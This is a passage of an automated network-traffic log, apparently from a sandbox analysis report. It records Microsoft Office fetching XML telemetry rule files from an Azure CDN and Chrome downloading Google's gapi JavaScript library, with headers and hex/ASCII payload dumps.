                                                                                                                                                                                                                                                                                      x-ms-request-id: d7880247-601e-0070-328c-3aa0c9000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095425Z-1777c6cb754vxwc9hC1TEBykgw00000009ag00000000e5a2
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:25 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      79192.168.2.64979813.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:25 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:25 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 26217b89-b01e-001e-808c-3a0214000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095425Z-185f5d8b95c4bhwphC1NYCs8gw0000000a600000000089df
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:25 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      80192.168.2.64979913.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:25 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:25 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 174
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B91D80E15"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 5a5a0c5e-c01e-0079-588c-3ae51a000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095425Z-185f5d8b95c4vwv8hC1NYCy4v40000000a90000000002a7h
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:25 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      81192.168.2.649802142.250.186.464433524C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:26 UTC721OUTGET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: apis.google.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUX
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:26 UTC915INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                      Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access
                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access"
                                                                                                                                                                                                                                                                                      Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]}
                                                                                                                                                                                                                                                                                      Content-Length: 117949
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      Server: sffe
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 01:21:04 GMT
                                                                                                                                                                                                                                                                                      Expires: Thu, 20 Nov 2025 01:21:04 GMT
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                      Last-Modified: Thu, 10 Oct 2024 19:55:27 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Age: 30802
                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:26 UTC475INData Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 30 78 38 30 30 30 30 30 2c 20 5d 29 3b 0a 76 61 72 20 64 61 2c 65 61 2c 68 61 2c 6e 61 2c 6f 61 2c 73 61 2c 74 61 2c 77 61 3b 64 61 3d 66 75 6e
                                                                                                                                                                                                                                                                                      Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x800000, ]);var da,ea,ha,na,oa,sa,ta,wa;da=fun
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:26 UTC1390INData Raw: 6e 20 61 3b 61 5b 62 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45
                                                                                                                                                                                                                                                                                      Data Ascii: n a;a[b]=c.value;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw E
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:26 UTC1390INData Raw: 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 62 29 72 65 74 75 72 6e 20 62 2e 63 61 6c 6c 28 61 29 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 3d 3d 22 6e 75 6d 62 65 72 22 29 72 65 74 75 72 6e 7b 6e 65 78 74 3a 64 61 28 61 29 7d 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 62 60 22 2b 53 74 72 69 6e 67 28 61 29 29 3b 7d 3b 73 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 62 29 7d 3b 74 61 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e
                                                                                                                                                                                                                                                                                      Data Ascii: efined"&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if(typeof a.length=="number")return{next:da(a)};throw Error("b`"+String(a));};sa=function(a,b){return Object.prototype.hasOwnProperty.call(a,b)};ta=typeof Object.assign=="function"?Object.
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:26 UTC1390INData Raw: 3b 74 68 69 73 2e 4e 72 3d 5b 5d 3b 74 68 69 73 2e 68 56 3d 21 31 3b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 74 72 79 7b 68 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 63 61 74 63 68 28 6c 29 7b 6b 2e 72 65 6a 65 63 74 28 6c 29 7d 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6a 46 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 68 28 6d 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6c 7c 7c 28 6c 3d 21 30 2c 6d 2e 63 61 6c 6c 28 6b 2c 6e 29 29 7d 7d 76 61 72 20 6b 3d 74 68 69 73 2c 6c 3d 21 31 3b 72 65 74 75 72 6e 7b 72 65 73 6f 6c 76 65 3a 68 28 74 68 69 73 2e 53 64 61 29 2c 72 65 6a 65 63 74 3a 68 28 74 68 69 73 2e 54 4a 29 7d 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 53 64 61 3d 66 75 6e 63 74 69
                                                                                                                                                                                                                                                                                      Data Ascii: ;this.Nr=[];this.hV=!1;var k=this.jF();try{h(k.resolve,k.reject)}catch(l){k.reject(l)}};e.prototype.jF=function(){function h(m){return function(n){l||(l=!0,m.call(k,n))}}var k=this,l=!1;return{resolve:h(this.Sda),reject:h(this.TJ)}};e.prototype.Sda=functi
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:26 UTC1390INData Raw: 74 6f 74 79 70 65 2e 47 37 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 4e 72 21 3d 6e 75 6c 6c 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 74 68 69 73 2e 4e 72 2e 6c 65 6e 67 74 68 3b 2b 2b 68 29 66 2e 58 4f 28 74 68 69 73 2e 4e 72 5b 68 5d 29 3b 0a 74 68 69 73 2e 4e 72 3d 6e 75 6c 6c 7d 7d 3b 76 61 72 20 66 3d 6e 65 77 20 62 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 79 66 61 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 68 2e 69 79 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 7a 66 61 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 6b 29 7b 76 61 72 20 6c 3d 74 68 69 73 2e 6a 46 28 29 3b 74 72 79 7b 68 2e 63 61 6c 6c 28 6b 2c 6c 2e 72 65 73 6f 6c 76 65
                                                                                                                                                                                                                                                                                      Data Ascii: totype.G7=function(){if(this.Nr!=null){for(var h=0;h<this.Nr.length;++h)f.XO(this.Nr[h]);this.Nr=null}};var f=new b;e.prototype.yfa=function(h){var k=this.jF();h.iy(k.resolve,k.reject)};e.prototype.zfa=function(h,k){var l=this.jF();try{h.call(k,l.resolve
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:26 UTC1390INData Raw: 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 22 29 3b 72 65 74 75 72 6e 20 61 2b 22 22 7d 3b 0a 6e 61 28 22 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 73 74 61 72 74 73 57 69 74 68 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 76 61 72 20 64 3d 45 61 28 74 68 69 73 2c 62 2c 22 73 74 61 72 74 73 57 69 74 68 22 29 2c 65 3d 64 2e 6c 65 6e 67 74 68 2c 66 3d 62 2e 6c 65 6e 67 74 68 3b 63 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 4d 61 74 68 2e 6d 69 6e 28 63 7c 30 2c 64 2e 6c 65 6e 67 74 68 29 29 3b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 66 26 26 63 3c 65 3b 29 69 66 28 64 5b 63 2b 2b 5d 21 3d 62 5b 68 2b 2b 5d 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 20 68 3e 3d 66 7d 7d
                                                                                                                                                                                                                                                                                      Data Ascii: egular expression");return a+""};na("String.prototype.startsWith",function(a){return a?a:function(b,c){var d=Ea(this,b,"startsWith"),e=d.length,f=b.length;c=Math.max(0,Math.min(c|0,d.length));for(var h=0;h<f&&c<e;)if(d[c++]!=b[h++])return!1;return h>=f}}
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:26 UTC1390INData Raw: 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 65 22 29 3b 64 28 6c 29 3b 69 66 28 21 73 61 28 6c 2c 66 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 66 60 22 2b 6c 29 3b 6c 5b 66 5d 5b 74 68 69 73 2e 47 61 5d 3d 6d 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 72 65 74 75 72 6e 20 63 28 6c 29 26 26 73 61 28 6c 2c 66 29 3f 6c 5b 66 5d 5b 74 68 69 73 2e 47 61 5d 3a 76 6f 69 64
                                                                                                                                                                                                                                                                                      Data Ascii: (l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw Error("e");d(l);if(!sa(l,f))throw Error("f`"+l);l[f][this.Ga]=m;return this};k.prototype.get=function(l){return c(l)&&sa(l,f)?l[f][this.Ga]:void
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:26 UTC1390INData Raw: 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 52 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 52 6b 3d 0a 6b 2e 5a 65 2e 52 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 74 68 69 73 5b 31 5d 2e 52 6b 3d 66 28 29 3b 74 68 69 73 2e 73 69 7a 65 3d 30 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 72 65 74 75 72 6e 21 21 64 28 74 68 69 73 2c 6b 29 2e 5a 65 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                                                                      Data Ascii: h||delete this[0][k.id],k.Ze.Rk.next=k.Ze.next,k.Ze.next.Rk=k.Ze.Rk,k.Ze.head=null,this.size--,!0):!1};c.prototype.clear=function(){this[0]={};this[1]=this[1].Rk=f();this.size=0};c.prototype.has=function(k){return!!d(this,k).Ze};c.prototype.get=function(
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:26 UTC1390INData Raw: 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e 65 78 74 28 29 3b 69 66 28 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 21 3d 63 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 63 29 72 65 74 75 72 6e 21 31 3b 66 3d 65 2e 6e 65 78 74 28 29 3b 72 65 74 75 72 6e 20 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 3d 3d 63 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 2e 78 21 3d 34 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 66 2e 76 61 6c 75 65 5b 30 5d 3f 21 31 3a 65 2e 6e 65
                                                                                                                                                                                                                                                                                      Data Ascii: ]));if(!d.has(c)||d.size!=1||d.add(c)!=d||d.size!=1||d.add({x:4})!=d||d.size!=2)return!1;var e=d.entries(),f=e.next();if(f.done||f.value[0]!=c||f.value[1]!=c)return!1;f=e.next();return f.done||f.value[0]==c||f.value[0].x!=4||f.value[1]!=f.value[0]?!1:e.ne
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:26 UTC1390INData Raw: 64 2b 2b 29 7b 76 61 72 20 65 3d 4e 75 6d 62 65 72 28 61 72 67 75 6d 65 6e 74 73 5b 64 5d 29 3b 69 66 28 65 3c 30 7c 7c 65 3e 31 31 31 34 31 31 31 7c 7c 65 21 3d 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 69 6e 76 61 6c 69 64 5f 63 6f 64 65 5f 70 6f 69 6e 74 20 22 2b 65 29 3b 65 3c 3d 36 35 35 33 35 3f 63 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 65 29 3a 28 65 2d 3d 36 35 35 33 36 2c 63 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 65 3e 3e 3e 31 30 26 31 30 32 33 7c 35 35 32 39 36 29 2c 63 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 65 26 31 30 32 33 7c 35 36 33 32 30 29 29 7d 72 65 74 75 72 6e 20 63 7d 7d 29 3b 6e 61 28
                                                                                                                                                                                                                                                                                      Data Ascii: d++){var e=Number(arguments[d]);if(e<0||e>1114111||e!==Math.floor(e))throw new RangeError("invalid_code_point "+e);e<=65535?c+=String.fromCharCode(e):(e-=65536,c+=String.fromCharCode(e>>>10&1023|55296),c+=String.fromCharCode(e&1023|56320))}return c}});na(


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      82192.168.2.64980413.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:26 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:26 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 958
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 47e3bf54-c01e-0082-038c-3aaf72000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095426Z-r1d97b9957747b9jhC1TEBgyec00000008s000000000af5m
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
